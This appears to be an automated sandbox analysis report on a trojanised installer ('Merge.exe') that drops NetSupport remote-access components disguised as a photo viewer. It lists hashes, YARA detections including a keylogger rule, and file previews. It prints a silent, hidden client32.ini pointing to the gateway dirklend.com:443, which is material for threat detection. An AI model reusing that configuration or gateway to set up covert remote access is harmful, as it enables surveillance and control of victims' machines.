                                                                                                  Preview:.{v....VK,.k..k.#..................................1012546698.?=<>/! #awi{bLXGETAJ@%~70VTWVXX[Z.Y_^@HCBEqu.xxs}xHONqqsru.rvyysz}|JFYTZPVSbfihjjml.k...............s.............................W.......................$.......................'........................................................................48;:<<?>.%#"$,'&)AE^H^AO=^SRUUWVY.^Z]]W^A@wpruqvqqDJMLNNqp.wutv~yx{........redggihk.hloi....................q..................................................................m................]................|.w.t.c.x.>.A.j.r.l.k.b.}.W.~.n.G0V2"476,8;:.:?>#.#"%.'V)Z+E-K/\Q1S?U0W7Y,[;]y_.A5C1E+G(I-K>M.O:q.s.u.wnyx{z}|..d`cbedgfphkjulon....................................................?.........................................b.................(k"t"gq}ibmk.rpss;50tqbh08.9...1(325.2699.:=<.Fc.ggAACd....O.Jhf.`.ml1anao.d.ji.yzz .%qWHKJULON.usrtVwvy,./E=,....22V?Q\0.S'$.).................................................................B.....

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\Skins\Savegame.wav

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, stereo 44100 Hz
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5016910
                                                                                                  Entropy (8bit):7.4514421328563225
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:M/5DCbiskOa2Wm4o7wcWwnqwH4HDgsHbPbn8gU4xH7U+bTb3gGQf+nYqjUp3Oj:MlUkV2Wm4ofWOW3bPbn8YbTsfWnYmU36
                                                                                                  MD5:83C72A36AFAE7542CE660730959C8E2F
                                                                                                  SHA1:318694CBF96D828D284AACE9EA0148BA56D1CCB0
                                                                                                  SHA-256:634D9F12D277E1A2C8E2E20364AE9FE31543F485DDFF08CB6BF07A611B5BD054
                                                                                                  SHA-512:9DDA43FA2323DEAA5DD868A8A8D375B7E8A3B7802735511051A7D0C258949CFDA0243BD143BD3D981D9097816BE716B27205F9B7AEDAEE5919156E2B4BDD84D5
                                                                                                  Malicious:false
                                                                                                  Preview:RIFFF.L.WAVEfmt ........D...........LIST....INFOISFT....Lavf57.83.100.data..L.................................................................................................................................................................................................................................................................................................................(.(............././.'.'.:.:.....'.'.............................................................b.b.o.o.............................................l.l.........,.,.....-.-.....2.2.....%.%.....*.*.".".............................................................?.?.,.,.4.4././.....+.+.#.#.,.,.0.0.1.1.<.<.3.3.........................................................>.>.H.H.=.=.C.C.=.=.L.L.@.@.N.N.?.?.N.N.J.J.V.V.H.H.*.*.........H H @ @ E E H H 9 9 A A @ @ K K 8 8 ; ; ....................................................i.i.............................................=.=.v.v.Z.Z.......................................

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\audiocapture.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):89416
                                                                                                  Entropy (8bit):6.460405476979317
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:ZrOxYZwDgyfoVD/Ksdl0R8rKZEmU2ffE7CdmW1B1jvmhxccp2UvHNORpPePtJPv4:ZrOxDJs/Ksdl0R1dBmhFJERpPyJPvuXR
                                                                                                  MD5:7629AF8099B76F85D37B3802041503EE
                                                                                                  SHA1:F40A5EFCB9DEE679DE22658C6F95C7E9C0F2F0C0
                                                                                                  SHA-256:2CC8EBEA55C06981625397B04575ED0EAAD9BB9F9DC896355C011A62FEBE49B5
                                                                                                  SHA-512:C209714FFDB0B95595583976340F2EB901EB9895F2F420AFC4CA3C12744432E52FBEDFD857B56CB347D4475DF7678BD42D43F221208A108384E1DF5AAF7D19E4
                                                                                                  Malicious:false
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\audiocapture.dll, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..in.:n.:n.:g.6:|.:g. :".:g.':J.:g.0:i.:n.:5.:g.):i.:g.1:o.:p.7:o.:g.2:o.:Richn.:........PE..L....n.R...........!.........j.......S............0.................................4e..............................@*..-...."..P....P..X............D..H....`..4...p...................................@...............@............................text............................... ..`.rdata..m;.......<..................@..@.data........0......................@....rsrc...X....P.......$..............@..@.reloc..T....`.......,..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\bass.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):139128
                                                                                                  Entropy (8bit):7.958465073866813
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:/72t5TbcTRQe9Kb/q7J0U2VQLYopjy7qMjzlvo:DY5T4VQ5QmU26LFpjy7rBo
                                                                                                  MD5:8E58FCC0672A66C827C6F90FA4B58538
                                                                                                  SHA1:3E807DFD27259AE7548692A05AF4FE54F8DD32ED
                                                                                                  SHA-256:6E1BF8EA63F9923687709F4E2F0DAC7FF558B2AB923E8C8AA147384746E05B1D
                                                                                                  SHA-512:0E9FAF457A278AD4C5DD171F65C24F6A027696D931A9A2A2EDD4E467DA8B8A9E4AB3B1FD2D758F5744BF84BECE88C046CDA5F7E4204BEAD14D7C36A46702B768
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Fc...........!....0............................................................V....@.............................@...............@...........0...H...........................................................P...P...............................................................@..@.rsrc....0..........................@..@petite..0.......0...................`..`.....................^8,../..........#c....$..1...p......b.f.....a...e..E...#..9&~h!8.l...|...O.#L..H.....9<.0..F6.....!.h..z..Q,rr..!(.g....q`.a'WyXS........a......h.....c.Y......yS.2.......`......,06..N...`..Px....i.....-.}.."..0....&.!.,..m.'.>.',.O;.......VO..%` .G......`....g9..cd.."....I4..w.#..`.W................(.M.......f.....n2..#...X.J50......bg..B..4..D.U......2J.GruMv..).....A'.TE......LSp.....@..5../..F..8...U..fn...._=.....20.V7B.:0.H..UGS1[Xt=.6....c0..(../$..X.&

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\client32.ini

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):713
                                                                                                  Entropy (8bit):5.524944650124626
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:vqSWqzd+mPZGShR8kkiBlsVTXuZ7+DP981E7GXXfDWQCYnmSux3A1x:vqSWqzEmPZNR8piBlLoG1fXXfD/kA1x
                                                                                                  MD5:91AC08A10B4DB5162E75E05F083D4489
                                                                                                  SHA1:178376B0E05605D6FFD5D5429904953A7A347304
                                                                                                  SHA-256:46CE6627CA33F6EE5EA54247A4431B97381BEBD5C71B6BB23355DABE3D375A8B
                                                                                                  SHA-512:AE9B425829DF720480D2C10D8101E06548BA590318C3E3EA0DDC5B8B6127D606D37AB11E3673B50D409BA2295B05ECD93431A9DD0D05CFA8AAD60F725772003B
                                                                                                  Malicious:false
                                                                                                  Preview:0xb3579d9b....[Client].._present=1..DisableChatMenu=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..GatewayAddress=dirklend.com:443..gsk=EIHK;N?BBGEM9D<L@ECEFF9H<K..gskmode=0..GSK=EIHK;N?BBGEM9D<L@ECEFF9H<K..GSKX=EIHK;N?BBGEM9D<L@ECEFF9H<K..

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\htctl32.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):323912
                                                                                                  Entropy (8bit):6.732880567545257
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:WyspIr8g8imeKk9Fv8TamdF3xuHGAimnx30aaY5nFJl8NjzGrn0J/d3M1OGg:WyspIr8g8i191uzdwHGAimd0bY5FJl85
                                                                                                  MD5:051CDB6AC8E168D178E35489B6DA4C74
                                                                                                  SHA1:38C171457D160F8A6F26BAA668F5C302F6C29CD1
                                                                                                  SHA-256:6562585009F15155EEA9A489E474CEBC4DD2A01A26D846FDD1B93FDC24B0C269
                                                                                                  SHA-512:602AB9999F7164A2D1704F712D8A622D69148EEFE9A380C30BC8B310EADEDF846CE6AE7940317437D5DA59404D141DC2D1E0C3F954CA4AC7AE3497E56FCB4E36
                                                                                                  Malicious:false
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\htctl32.dll, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L...U.T...........!.................Z.......................................P............@......................... ...k....y..x.......@...............H........0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\msvcr100.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):773968
                                                                                                  Entropy (8bit):6.901559811406837
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                  MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                  SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                  SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                  SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\nskbfltr.inf

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:Windows setup INFormation
                                                                                                  Category:dropped
                                                                                                  Size (bytes):328
                                                                                                  Entropy (8bit):4.93007757242403
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                  MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                  SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                  SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                  SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                  Malicious:false
                                                                                                  Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\nsm.ini

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:Non-ISO extended-ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6099
                                                                                                  Entropy (8bit):4.585800710725142
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:L1DgNnkStXsfpsNXl0o1n49+jJeQScwzTHXllBXl3SXlcwah0SgAh0su9h0kEhhd:h4nt9kgamEvfUsrywp7
                                                                                                  MD5:99F493DCE7FAB330DC47F0CAB8FE6172
                                                                                                  SHA1:16906FB5988303BB462B65FF4ECE23539A12F4B5
                                                                                                  SHA-256:E0ED36C897EAA5352FAB181C20020B60DF4C58986193D6AAF5BF3E3ECDC4C05D
                                                                                                  SHA-512:2C58171C30AEC8AE131A7C32162856FCE551B55F861D0D9FB0E27A91BD7084388DF5860392F80CDBC6DF6E64E97D8BF2CAE587C3D6B7C142CE711AE8E240BB01
                                                                                                  Malicious:false
                                                                                                  Preview:Installdir=..Client=1..Configurator=0..Control=0..ControlDeskIcon=0..Gateway=0..RemoteDeploy=0..Scripting=0..Student=0..TechConsole=0..Tutor=0..ClientIcon=0..ConfigIcon=0..ControlIcon=0..RemoteDeployIcon=0..ScriptingIcon=0..TechConsoleDeskIcon=0..TechConsoleIcon=0..TutorDeskIcon=0..TutorIcon=0..ClientParams=..CLIENT32=..PINServer=0........# This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....# To ensure correct operation please ensure that the above section is not altered in any way except to change the values ..# for the parameters. The parameter names are case sensitive. ....# Installdir=<driveletter:path>..# e.g. ..# Installdir=e:\my dir1\my dir2\..#..# Determines the drive and directory where the product will be installed. ..# No quotes are required, normal Windows directory naming restrictions apply.....# Client=<1/0>..# e.g...# Client=1..# Controls whether the cli

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\nsm.lic

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):261
                                                                                                  Entropy (8bit):5.12285059281769
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:O/oPeU4xRPjwxVp8WdDKHMoEEjLgpW2M+xrXrIXZNWYpPM/ioM4La8l6i7s:XGpR7wxX8W8JjjqW2MAXWNBPM/iom8lM
                                                                                                  MD5:886E4BB84E1ECC4A04AE599D76FCCE1D
                                                                                                  SHA1:3F0493BB2088AF50BCC8223462DB0B207354E946
                                                                                                  SHA-256:5EEB014E3B390E0C85CE72988D422DCD9DE1520566B11755C70BDD9BB7376060
                                                                                                  SHA-512:F4DB9038A113C4B1E2462B3E0BECEF2500C9532A79C8187F51D011D690BC68C6D1A99585E43136CB082BD6A232136546DB50265F226FF19E67D8430306A8761F
                                                                                                  Malicious:false
                                                                                                  Preview:1200..0x5ecfb5df....; NetSupport License File...; Generated on 02:56 - 17/10/2015........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=RETHNQOPD22..maxslaves=100000..os2=1..product=10..serial_no=NSM298578..shrink_wrap=0..transport=0..

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\nsm_vpro.ini

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):46
                                                                                                  Entropy (8bit):4.532048032699691
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                                  MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                                  SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                                                  SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                                  SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                                  Malicious:false
                                                                                                  Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicapi.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):108944
                                                                                                  Entropy (8bit):5.800439974193529
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:LnzOfAUs8aONOb2H4NECHnTXg05rQMb2bbaPrw6BkJElFBIboKKGQ1w:LnSfAB8cb2YN7pSy8AuElFBIboKKGSw
                                                                                                  MD5:67C53A770390E8C038060A1921C20DA9
                                                                                                  SHA1:49E63AF91169C8CE7EF7DE3D6A6FB9F8F739FA3A
                                                                                                  SHA-256:2DFDC169DFC27462ADC98DDE39306DE8D0526DCF4577A1A486C2EEF447300689
                                                                                                  SHA-512:201E07DBCCD83480D6C4D8562E6D0A9E4C52ED12895F0B91D875C2BBCC50B3B1802E11E5E829C948BE302BF98EBDE7FB2A99476065D1709B3BDBCD5D59A1612D
                                                                                                  Malicious:false
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicapi.dll, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m...m...m.......l.....{.......:.....j...m.......k...l...k...h.......l.......l...Richm...........PE..L....b.R...........!.........p.......\............p..........................p...................................... .......`...P....@..............H...H....P.......................................................................................text...>........................... ..`.rdata........... ..................@..@.data...|.... ...@... ..............@....rsrc........@.......`..............@..@.reloc.......P... ...p..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcichek.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14664
                                                                                                  Entropy (8bit):5.731764073034684
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:uuYr6062b6Z1HVF6RRHXPPr+13fnYe+PjPIrI9FlP4r9ZCspE+TMlr78Vkf:uuYe72u6r+5nYPL7NheMr
                                                                                                  MD5:3AABCD7C81425B3B9327A2BF643251C6
                                                                                                  SHA1:EA841199BAA7307280FC9E4688AC75E5624F2181
                                                                                                  SHA-256:0CFF893B1E7716D09FB74B7A0313B78A09F3F48C586D31FC5F830BD72CE8331F
                                                                                                  SHA-512:97605B07BE34948541462000345F1E8F9A9134D139448D4F331CEFEECA6DAD51C025FCAB09D182B86E5A4A8E2F9412B3745EC86B514B0523497C821CB6B8C592
                                                                                                  Malicious:false
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcichek.dll, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...+..R...........!......................... ...............................`...........@.........................p"..a.... ..P....@............... ..H....P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicl32.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3490632
                                                                                                  Entropy (8bit):6.524926029037826
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:FwWtZSlgPoqxyszApD0Ew0J94KinCgqGBQTdTBOHa3clSToWZiwDA:FwWrSlgHyszApD090mCgqTUSPE9
                                                                                                  MD5:E7B92529EA10176FE35BA73FA4EDEF74
                                                                                                  SHA1:FC5B325D433CDE797F6AD0D8B1305D6FB16D4E34
                                                                                                  SHA-256:B6D4AD0231941E0637485AC5833E0FDC75DB35289B54E70F3858B70D36D04C80
                                                                                                  SHA-512:FB3A70E87772C1FB386AD8DEF6C7BDF325B8D525355D4386102649EB2D61F09CE101FCE37CCC1F44D5878E604E2E426D96618E836367AB460CAE01F627833517
                                                                                                  Malicious:false
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicl32.dll, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicl32.dll, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........7...Y...Y...Y.x.....Y..o...Y......Y...]...Y..o...Y.....Y...X...Y.....Y.....Y..o...Y..o.;.Y..o...Y..o...Y..o...Y.Rich..Y.........................PE..L......T...........!.....h...&................................................5......46..............................C..................P............*5.H.....3.(......................................@...................h...`....................text...|f.......h.................. ..`.rdata...............l..............@..@.data...(!...P.......2..............@....tls................................@....hhshare............................@....rsrc...P...........................@..@.reloc..T!....3.."....3.............@..B........................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\remcmdstub.exe

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):59728
                                                                                                  Entropy (8bit):6.314316932816872
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:Uf6nvXuNcAjJMBUHYBlXU1wT2JFqywsQ:e6nPcjJ4U4I1jFqywL
                                                                                                  MD5:5BE6FB8F28544D4F83C25A2B76FF7890
                                                                                                  SHA1:6AD5D9338984C52B37F2176C8AE4AE2366A7FD25
                                                                                                  SHA-256:B11380F81B0A704E8C7E84E8A37885F5879D12FBECE311813A41992B3E9787F2
                                                                                                  SHA-512:7635FC41DD7BE6A55D944DB7790E31FD607BFDC67845185FACD52BCDA24DA139C5BA4FE0292EAD097EAA606ED53FCFD2CE96C2FB7A15F3ABA5FE7262E8041028
                                                                                                  Malicious:false
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\remcmdstub.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$U..`4..`4..`4..{.D.q4..{.p.54..iLI.e4..`4..74..{.q.}4..{.@.a4..{.G.a4..Rich`4..................PE..L...Nm.R.....................J.......!............@.......................... ............@....................................<.......X...............P...............................................@...............@............................text............................... ..`.rdata...%.......&..................@..@.data....-..........................@....rsrc...X...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\tcctl32.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):387400
                                                                                                  Entropy (8bit):6.790076330169725
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:bn452GF6HWSJkgGjMTUjemzWz+ZsYRtFM2V3KZ/aDVpIxNc+KT5Ev7pt0AUazmgt:D452GF6HlkgGjMT8emzWusytFMKDXIxj
                                                                                                  MD5:1E6E804CA71EAF5BEF0ABEF95C578CF0
                                                                                                  SHA1:8EB7E6EFF15EDCB01D20322C4994512FDD1DD227
                                                                                                  SHA-256:6FFE12CDFE0A36DEC4B4A40ECDAFB4097B1AF7C340B0FCECF9F5C67B7FA8B299
                                                                                                  SHA-512:197B782EFA21AC87A54D3E63F90A75D80D70A30BFD686D29ED36EDE79328DB2AEF58C8B242906BF7A6C9C0B33B8FA5F0EF23E541BB0D5C0786481BDCCE191061
                                                                                                  Malicious:false
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\tcctl32.dll, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....).T...........!................w........................................p...........@..........................w..o...Tk..x.......@...............H.... ...D..................................`O..@...............h............................text...,........................... ..`.rdata../...........................@..@.data...h............j..............@....rsrc...@...........................@..@.reloc...E... ...F..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\zxing.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11099136
                                                                                                  Entropy (8bit):6.484410783068131
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:196608:tOrlHcZAJV6yk6yKPj6Povvihvi6UZOUZMRthNGdiO5iUld3ZyM+6xHECMgwO855:Q8ZAJgLhNGdiO5iUld3ZyM+6xHECMgwz
                                                                                                  MD5:DA5B9A31F05338118A3877EC516BE04A
                                                                                                  SHA1:1084AB557940F064C6B2CF12129E6376FAC6ED27
                                                                                                  SHA-256:0919BB5672C2289161194940B030495C1E4D5CDCFBC1D8FED652B4652525F687
                                                                                                  SHA-512:7AC4FF3AFF9B3C50C6C5CA57B5820A831EFEC9DCDDA1C69FB82B1DF1E3E0E7B3F5631288774D3CCFDD2A7DEBDF7B7062DA59AB6FE024EDB282D55FF3FF05E44B
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 13%
                                                                                                  Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$........{!...O...O...O..bL...O..bJ.d.O..bK...O.......O...L...O...K...O...J...O...K...O.X.K...O..K...O...K...O.X.J...O..J...O...O...O...K...O..bN...O...N...O...F...O...O...O.......O...M...O.Rich..O.........PE..L...k..g...........!...)..W...Q.....t.Q.......W...........................................@................................x..........`...........................x...8...............................@.............W.`............................text...l.W.......W................. ..`.rdata..L.O...W...O...W.............@..@.data............................@....rsrc...`...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\TMP3B6C.tmp

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:7-zip archive data, version 0.4
                                                                                                  Category:dropped
                                                                                                  Size (bytes):27630784
                                                                                                  Entropy (8bit):7.999987918643883
